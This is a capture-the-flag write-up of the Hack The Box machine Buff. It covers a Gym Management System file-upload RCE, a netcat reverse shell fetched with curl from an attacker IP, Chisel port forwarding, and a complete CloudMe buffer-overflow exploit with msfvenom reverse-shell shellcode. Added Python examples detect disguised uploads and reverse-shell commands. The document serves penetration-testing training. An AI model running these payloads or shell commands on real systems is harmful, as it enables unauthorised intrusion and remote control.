Hack The Box Write-Up Buff - 10.10.10.198
Notoriety wasn’t as good as fame, but was heaps better than obscurity.
Neil Gaiman
About Buff
In this post, I’m writing a write-up for the machine Buff from Hack The Box. Hack The Box is an online platform to train your ethical hacking and penetration testing skills.
Buff is an ‘Easy’ rated box. Submitting the user.txt flag raises your points by 10, and submitting the root flag raises your points by 20.
Foothold
After the initial port scan with Nmap, we discover one open port, 8080/tcp. Behind this port, there is a web server running the Gym Management Software version 1.0. This version suffers from an unauthenticated Remote Code Execution (RCE) vulnerability.
User
After downloading and running the exploit, we had a web shell on the machine and could read the user flag.
Root
During enumeration, we find the file CloudMe_1112.exe in the Downloads folder. Through searchsploit, we find that this version suffers from a Buffer Overflow (BOF) vulnerability. The CloudMe application is running locally on port 8888/tcp. To get this exploit working, we need to reverse-tunnel this port to our attacker machine; then we can run the exploit to gain a reverse shell as the administrator and root this machine.
Machine Info
Machine Name: Buff
Difficulty: Easy
Points: 20
Release Date: 19 Jul 2020
IP: 10.10.10.198
Creator: egotisticalSW
Recon
Port scan with Nmap
As always, we start the box with an Nmap port scan.
nmap -sC -sV -oA ./nmap/10.10.10.198 10.10.10.198
The results of the port scan.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-28 17:36 CEST
Nmap scan report for 10.10.10.198
Host is up (0.021s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.60 seconds
As we can see from the results, there is only one open port, 8080/tcp. An Apache web server is running behind this port, serving a website with the title mrb3n's Bro Hut.
Enumeration
Enumeration Web Server
We can check the web service running on HTTP port 8080 by entering the URL http://10.10.10.198:8080 in Firefox. I landed on the homepage of mrb3n's Bro Hut.
On the Contact page we see that the website is made with the Gym Management System 1.0.
Through searchsploit, we can search for a known vulnerability in this version of the management system. It seems that this version of the Gym Management software has an Unauthenticated Remote Code Execution vulnerability.
~$ searchsploit Gym
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - Unauthenticated Remote Code Execution | php/webapps/48506.py
WordPress Plugin WPGYM - SQL Injection | php/webapps/42801.txt
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Exploitation
Unauthenticated Remote Code Execution
I copied the exploit 48506.py to my working directory and analyzed the code. Gym Management System version 1.0 suffers from an unauthenticated file upload vulnerability that allows remote attackers to gain Remote Code Execution (RCE) on the hosting web server by uploading a maliciously crafted PHP file that bypasses the image upload filters.
Let’s run the exploit to get a web shell. If you have problems running this exploit because it wants to run with Python3, I solved this problem with the steps below. You can also upgrade the exploit to support Python 3, but that takes too long, so we’re going to install pip for Python 2.7 so that we can install the missing Python 2.7 modules.
First, install pip for Python2. To install pip, we need to download the get-pip.py Python script.
~$ wget https://bootstrap.pypa.io/get-pip.py
--2020-08-01 04:39:14-- https://bootstrap.pypa.io/get-pip.py
Resolving bootstrap.pypa.io (bootstrap.pypa.io)… 151.101.0.175, 151.101.64.175, 151.101.128.175, …
Connecting to bootstrap.pypa.io (bootstrap.pypa.io)|151.101.0.175|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: 1929903 (1.8M) [text/x-python]
Saving to: ‘get-pip.py’
get-pip.py 100%[=====================================================================================================>] 1.84M 1.57MB/s in 1.2s
2020-08-01 04:39:16 (1.57 MB/s) - ‘get-pip.py’ saved [1929903/1929903]
Then we can use Python version 2.7 to call this script. This script detects that it is being run by Python 2.7, and it will then download and install the latest pip version for Python 2.7.
~$ python2 get-pip.py
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality.
Collecting pip<21.0
Downloading pip-20.3.4-py2.py3-none-any.whl (1.5 MB)
|████████████████████████████████| 1.5 MB 1.6 MB/s
Collecting setuptools<45
Downloading setuptools-44.1.1-py2.py3-none-any.whl (583 kB)
|████████████████████████████████| 583 kB 1.7 MB/s
Collecting wheel
Downloading wheel-0.36.2-py2.py3-none-any.whl (35 kB)
Installing collected packages: pip, setuptools, wheel
Successfully installed pip-20.3.4 setuptools-44.1.1 wheel-0.36.2
After pip for Python 2.7 is downloaded and installed, we can download and install the missing modules.
~$ python -m pip install requests
~$ python -m pip install colorama
The missing modules are installed. We can now run the exploit.
~$ python 49506.py http://10.10.10.198:8080/
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG
buff\shaun
C:\xampp\htdocs\gym\upload> type C:\users\shaun\desktop\user.txt
�PNG
c23d5206ed1079f3f7466337bab963d2
After running the exploit, we have a web shell, and we can read the user flag. For me, this is the fastest foothold and user flag ever on Hack The Box. The next phase is to do a privilege escalation.
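Every command's output above starts with `�PNG`: the uploaded PHP file carries a PNG signature in front of its code, which is how it passed the image filter. The following is an added example, not part of the original write-up or the exploit, of a check a defender could run over an upload directory; the file names and sample contents are constructed.

```python
import re
import struct
import zlib

# Magic prefixes an upload filter typically trusts, and names PHP will execute.
IMAGE_MAGIC = {b"\x89PNG": "png", b"\xff\xd8\xff": "jpeg", b"GIF8": "gif"}
SCRIPT_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}
PHP_TAG = re.compile(rb"<\?(?:php|=)", re.IGNORECASE)


def png_well_formed(data):
    """Signature, IHDR as first chunk and IEND as last chunk must all be present."""
    return (data.startswith(b"\x89PNG\r\n\x1a\n")
            and data[12:16] == b"IHDR"
            and data[-8:-4] == b"IEND")


def inspect_upload(name, data):
    """Return the findings for one uploaded file; an empty list means clean."""
    findings = []
    # Check every dot-separated part, so "x.php.png" is caught as well as "x.php".
    if any(part in SCRIPT_EXT for part in name.lower().split(".")[1:]):
        findings.append("script-extension")
    kind = next((k for magic, k in IMAGE_MAGIC.items() if data.startswith(magic)), None)
    if PHP_TAG.search(data):
        findings.append("image-magic-with-php-tag" if kind else "php-tag")
    if kind == "png" and not png_well_formed(data):
        findings.append("malformed-png")
    return findings


# --- constructed sample data, not taken from the target machine ---
def _chunk(tag, body=b""):
    crc = zlib.crc32(tag + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + tag + body + struct.pack(">I", crc)


def sample_png():
    """A valid 1x1 greyscale PNG."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # filter byte + one pixel
    return (b"\x89PNG\r\n\x1a\n" + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", idat) + _chunk(b"IEND"))


SAMPLES = {
    "avatar.png": sample_png(),
    # PNG signature followed by an inert PHP comment (no executable payload)
    "avatar.php.png": b"\x89PNG\r\n\x1a\n<?php /* placeholder */ ?>",
    "readme.txt": b"gym opening hours",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, inspect_upload(name, data))
```

A signature check alone is what the filter got wrong; the structural check and the extension check on every name component are what separate the real image from the disguised script.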
Privilege Escalation
Reverse shell
I have to exit this web shell so that I have more commands at my disposal. I downloaded nc.exe to the box and created a reverse shell with PowerShell.
C:\xampp\htdocs\gym\upload> powershell -c "curl 10.10.16.144/nc.exe -o nc.exe"
�PNG
C:\xampp\htdocs\gym\upload> nc.exe 10.10.16.144 4444 -e powershell.exe
The reverse shell is established.
~$ netcat -lvvp 4444
Listening on any address 4444 (krb524)
whoami
Connection from 10.10.10.198:49794
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
whoami
buff\shaun
PS C:\xampp\htdocs\gym\upload>
The machine Buff runs a 64-bit Windows 10 Enterprise operating system.
C:\xampp\htdocs\gym\upload> systeminfo
�PNG
Host Name: BUFF
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.17134 N/A Build 17134
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: shaun
Registered Organization:
Product ID: 00329-10280-00000-AA218
Original Install Date: 16/06/2020, 15:05:58
System Boot Time: 29/07/2020, 14:24:20
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
...
After some time searching, I found the file CloudMe_1112.exe in the ‘Downloads’ folder of the user Shaun.
PS C:\Users\shaun\Downloads> ls
ls
Directory: C:\Users\shaun\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 16/06/2020 16:26 17830824 CloudMe_1112.exe
PS C:\Users\shaun\Downloads>
We can see that the software CloudMe is installed because its processes are running on this machine.
PS C:\> get-process
get-process
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
430 24 17700 9032 6908 1 ApplicationFrameHost
161 10 1936 2148 7256 1 browser_broker
239 19 25648 29328 316 0 CloudMe
288 36 32832 32 8612 0 CloudMe
45 4 1940 2320 0.00 2876 0 cmd
41 5 2752 3372 4432 0 cmd
If we check the connections on this machine, we see that this machine is listening on port 8888/tcp.
C:\xampp\htdocs\gym\upload> netstat -anop TCP
�PNG
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 956
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 5840
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 8380
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 4512
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 528
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1092
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1592
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2244
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 672
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 688
TCP 10.10.10.198:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.198:8080 10.10.16.101:49614 FIN_WAIT_2 4512
TCP 10.10.10.198:8080 10.10.16.101:49616 ESTABLISHED 4512
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 8092
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 1704
TCP 127.0.0.1:54468 127.0.0.1:3306 TIME_WAIT 0
TCP 127.0.0.1:54470 127.0.0.1:3306 TIME_WAIT 0
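The 127.0.0.1:8888 and 127.0.0.1:3306 rows are services a remote port scan never shows, yet any local process can reach them, so they belong in the patch inventory like any exposed service. The following is an added example, not part of the original write-up, that pulls loopback-only listeners out of `netstat -anop TCP` output; the rows are copied from the output above and the function names are my own.

```python
import ipaddress

# Rows copied from the netstat output above (a subset of the sockets shown).
NETSTAT = """\
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 4512
TCP 10.10.10.198:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.198:8080 10.10.16.101:49616 ESTABLISHED 4512
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 8092
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 1704
TCP 127.0.0.1:54470 127.0.0.1:3306 TIME_WAIT 0
"""


def parse_listeners(text):
    """Yield (scope, port, pid) for every TCP socket in LISTENING state."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 5 or fields[0] != "TCP" or fields[3] != "LISTENING":
            continue
        host, _, port = fields[1].rpartition(":")
        try:
            # IPv6 rows are printed as [::]:135, so drop the brackets first.
            ip = ipaddress.ip_address(host.strip("[]"))
        except ValueError:
            continue
        if ip.is_unspecified:
            scope = "all-interfaces"
        elif ip.is_loopback:
            scope = "loopback"
        else:
            scope = "single-interface"
        yield scope, int(port), int(fields[4])


def loopback_only(text):
    """Return sorted (port, pid) pairs that listen on loopback and nowhere else."""
    rows = list(parse_listeners(text))
    exposed = {port for scope, port, _ in rows if scope != "loopback"}
    return sorted((port, pid) for scope, port, pid in rows
                  if scope == "loopback" and port not in exposed)


if __name__ == "__main__":
    for port, pid in loopback_only(NETSTAT):
        print(f"loopback-only listener: tcp/{port} (PID {pid})")
```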
We can check searchsploit for CloudMe version 1.1.12 and it seems that this version has a Buffer Overflow (BOF) vulnerability.
~$ searchsploit cloudme
--------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) | windows/local/48499.txt
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit) | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass) | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass) | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) | windows_x86-64/remote/44784.py
--------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
I copied the exploit 48389.py to my working directory. After analyzing the payload, I came to the conclusion that we have to build a reverse tunnel. I downloaded Chisel 1.6.0 from GitHub: https://github.com/jpillora/chisel/releases/tag/v1.6.0. For my attacking machine, I downloaded chisel_1.6.0_linux_amd64.gz, and for the Windows machine, I downloaded chisel_1.6.0_windows_amd64.gz. Download the chisel_1.1.0.exe to the machine and start the chisel server locally.
We can start the chisel server on the attacker machine with a listener on port 5000.
~$ ./chisel_1.6.0_linux_amd64 server -p 5000 --reverse
2021/02/05 05:16:28 server: Reverse tunnelling enabled
2021/02/05 05:16:28 server: Fingerprint 2c:bc:a2:96:16:a4:07:3e:67:d7:72:2b:aa:68:be:cd
2021/02/05 05:16:28 server: Listening on 0.0.0.0:5000…
After downloading chisel to the Buff machine, we can forward port 8888 to our machine.
PS C:\xampp\htdocs\gym\upload> curl 10.10.16.144/chisel.exe -o chisel.exe
curl 10.10.16.144/chisel.exe -o chisel.exe
PS C:\xampp\htdocs\gym\upload> ./chisel.exe client 10.10.16.144:5000 R:8888:127.0.0.1:8888
./chisel.exe client 10.10.16.144:5000 R:8888:127.0.0.1:8888
2021/02/05 10:33:31 client: Connecting to ws://10.10.16.144:5000
2021/02/05 10:33:32 client: Fingerprint 2c:bc:a2:96:16:a4:07:3e:67:d7:72:2b:aa:68:be:cd
2021/02/05 10:33:33 client: Connected (Latency 191.5351ms)
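The commands run so far (shell commands issued through the web server, an executable pulled with curl, `nc.exe -e`, and a reverse forward to 127.0.0.1) all leave process-creation records. The following is an added example, not part of the original write-up, of detection rules run over such records; the command lines are the ones shown on this page, while the parent/child process pairings and rule names are constructed assumptions.

```python
import re

# Command-line rules; patterns are based on the command forms shown on this page.
RULES = {
    "reverse-forward-to-loopback": re.compile(
        r"\sR:(?:[^\s:]+:)?\d+:(?:127(?:\.\d{1,3}){3}|localhost):\d+\b", re.I),
    "netcat-exec-shell": re.compile(
        r"\b(?:nc|ncat|netcat)(?:\.exe)?\s.*\s-e\s+\S*(?:cmd|powershell)", re.I),
    "exe-download": re.compile(
        r"\b(?:curl|wget|iwr|invoke-webrequest)\b[^|]*\.exe\b", re.I),
}
# Assumed image names for an Apache/PHP stack on Windows (not shown on the page).
WEB_PARENTS = {"httpd.exe", "php-cgi.exe", "php.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

# Constructed events: (parent image, image, command line).
EVENTS = [
    ("httpd.exe", "cmd.exe", "cmd.exe /c whoami"),
    ("cmd.exe", "powershell.exe",
     'powershell -c "curl 10.10.16.144/nc.exe -o nc.exe"'),
    ("cmd.exe", "nc.exe", "nc.exe 10.10.16.144 4444 -e powershell.exe"),
    ("powershell.exe", "chisel.exe",
     "./chisel.exe client 10.10.16.144:5000 R:8888:127.0.0.1:8888"),
    ("explorer.exe", "powershell.exe", "powershell.exe -NoLogo"),
]


def match(event):
    """Return the names of all rules that fire for one process-creation event."""
    parent, image, cmdline = event
    hits = [name for name, rx in RULES.items() if rx.search(cmdline)]
    # A web server process should not normally start an interactive shell.
    if parent.lower() in WEB_PARENTS and image.lower() in SHELLS:
        hits.append("webserver-spawned-shell")
    return hits


def triage(events):
    """Return (command line, hits) for every event with at least one hit."""
    return [(e[2], match(e)) for e in events if match(e)]


if __name__ == "__main__":
    for cmdline, hits in triage(EVENTS):
        print(", ".join(hits), "<-", cmdline)
```

The parent-process rule is the most robust of the four, because it does not depend on tool names or argument spelling.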
Exploitation with Buffer Overflow
We can now create a reverse shell payload with msfvenom.
~$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.144 LPORT=5555 EXITFUNC=thread -b "\x00\x0d\x0a" -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1869 bytes
I can now place the payload in the exploit script. After the modification of the exploit, we are left with this script.
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
import socket
target = "127.0.0.1"
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.144 LPORT=5555 EXITFUNC=thread -b "\x00\x0d\x0a" -f python -v payload
payload = b""
payload += b"\xba\xdf\x45\x75\x98\xdb\xc2\xd9\x74\x24\xf4\x58"
payload += b"\x31\xc9\xb1\x52\x31\x50\x12\x83\xc0\x04\x03\x8f"
payload += b"\x4b\x97\x6d\xd3\xbc\xd5\x8e\x2b\x3d\xba\x07\xce"
payload += b"\x0c\xfa\x7c\x9b\x3f\xca\xf7\xc9\xb3\xa1\x5a\xf9"
payload += b"\x40\xc7\x72\x0e\xe0\x62\xa5\x21\xf1\xdf\x95\x20"
payload += b"\x71\x22\xca\x82\x48\xed\x1f\xc3\x8d\x10\xed\x91"
payload += b"\x46\x5e\x40\x05\xe2\x2a\x59\xae\xb8\xbb\xd9\x53"
payload += b"\x08\xbd\xc8\xc2\x02\xe4\xca\xe5\xc7\x9c\x42\xfd"
payload += b"\x04\x98\x1d\x76\xfe\x56\x9c\x5e\xce\x97\x33\x9f"
payload += b"\xfe\x65\x4d\xd8\x39\x96\x38\x10\x3a\x2b\x3b\xe7"
payload += b"\x40\xf7\xce\xf3\xe3\x7c\x68\xdf\x12\x50\xef\x94"
payload += b"\x19\x1d\x7b\xf2\x3d\xa0\xa8\x89\x3a\x29\x4f\x5d"
payload += b"\xcb\x69\x74\x79\x97\x2a\x15\xd8\x7d\x9c\x2a\x3a"
payload += b"\xde\x41\x8f\x31\xf3\x96\xa2\x18\x9c\x5b\x8f\xa2"
payload += b"\x5c\xf4\x98\xd1\x6e\x5b\x33\x7d\xc3\x14\x9d\x7a"
payload += b"\x24\x0f\x59\x14\xdb\xb0\x9a\x3d\x18\xe4\xca\x55"
payload += b"\x89\x85\x80\xa5\x36\x50\x06\xf5\x98\x0b\xe7\xa5"
payload += b"\x58\xfc\x8f\xaf\x56\x23\xaf\xd0\xbc\x4c\x5a\x2b"
payload += b"\x57\x79\x91\x23\x37\x15\xa7\x43\x22\x55\x2e\xa5"
payload += b"\x26\x89\x67\x7e\xdf\x30\x22\xf4\x7e\xbc\xf8\x71"
payload += b"\x40\x36\x0f\x86\x0f\xbf\x7a\x94\xf8\x4f\x31\xc6"
payload += b"\xaf\x50\xef\x6e\x33\xc2\x74\x6e\x3a\xff\x22\x39"
payload += b"\x6b\x31\x3b\xaf\x81\x68\x95\xcd\x5b\xec\xde\x55"
payload += b"\x80\xcd\xe1\x54\x45\x69\xc6\x46\x93\x72\x42\x32"
payload += b"\x4b\x25\x1c\xec\x2d\x9f\xee\x46\xe4\x4c\xb9\x0e"
payload += b"\x71\xbf\x7a\x48\x7e\xea\x0c\xb4\xcf\x43\x49\xcb"
payload += b"\xe0\x03\x5d\xb4\x1c\xb4\xa2\x6f\xa5\xd4\x40\xa5"
payload += b"\xd0\x7c\xdd\x2c\x59\xe1\xde\x9b\x9e\x1c\x5d\x29"
payload += b"\x5f\xdb\x7d\x58\x5a\xa7\x39\xb1\x16\xb8\xaf\xb5"
payload += b"\x85\xb9\xe5"
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, 8888))
    s.send(buf)
except Exception as e:
    # sys was never imported and sys.exc_value exists only in Python 2
    print(e)
The only thing we have to do is make sure that netcat is listening on port 5555 and then run the payload.
~$ python 48389.py
Reverse shell is established and we can own Buff.
~$ nc -lvvp 5555
listening on [any] 5555 …
10.10.10.198: inverse host lookup failed: Unknown host
connect to [10.10.16.144] from (UNKNOWN) [10.10.10.198] 49681
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
9dac8c83a3f6da218fb334836a7bdf1b
C:\Windows\system32>
Thanks for reading this write-up. This write-up and the machine Buff can be used for your preparation for the OSCP exam. I hope in the future to write a blog post about OSCP and how you can prepare for it. But first, I have to do the OSCP myself 🙂
If you like this write-up, please consider spending a respect point, my HTB profile: https://app.hackthebox.eu/profile/224856.
Happy Hacking :-)